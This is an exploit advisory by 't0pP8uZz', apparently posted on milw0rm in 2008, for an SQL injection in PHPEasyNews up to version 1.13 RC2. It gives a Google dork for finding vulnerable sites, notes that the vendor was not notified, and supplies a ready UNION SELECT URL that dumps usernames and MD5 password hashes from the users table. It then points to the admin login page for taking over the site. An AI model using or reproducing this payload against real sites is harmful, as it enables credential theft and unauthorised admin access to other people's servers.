58 lines
No EOL
1.4 KiB
Text
58 lines
No EOL
1.4 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ PHPEasyNews <= 1.13 RC2 SQL Injection Vulnerabilitys +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 4 JUNE 2008
|
|
[*] Script Download: http://brettjenkins.co.uk
|
|
[*] DORK: "PHPeasynews" (no stable dork, diff versions use diff text)
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
PHPEasyNews suffers from a insecure mysql query, this allows the remote attacker to
|
|
arbitrary pull information from the database. thus allowing to login has admin,
|
|
and possibly gaining a shell.
|
|
|
|
the injection returns multi data, so it will show all users, the first is normally the admin.
|
|
|
|
|
|
|
|
[*] SQL Injection:
|
|
|
|
http://site.com/newsarchive.php?post=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5,6/**/FROM/**/pen_users/*
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
admin login is at "admin.php"
|
|
|
|
all passwords are encrypted in MD5.
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
[-] peace,
|
|
|
|
t0pP8uZz
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ PHPEasyNews <= 1.13 RC2 SQL Injection Vulnerabilitys +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-06-14] |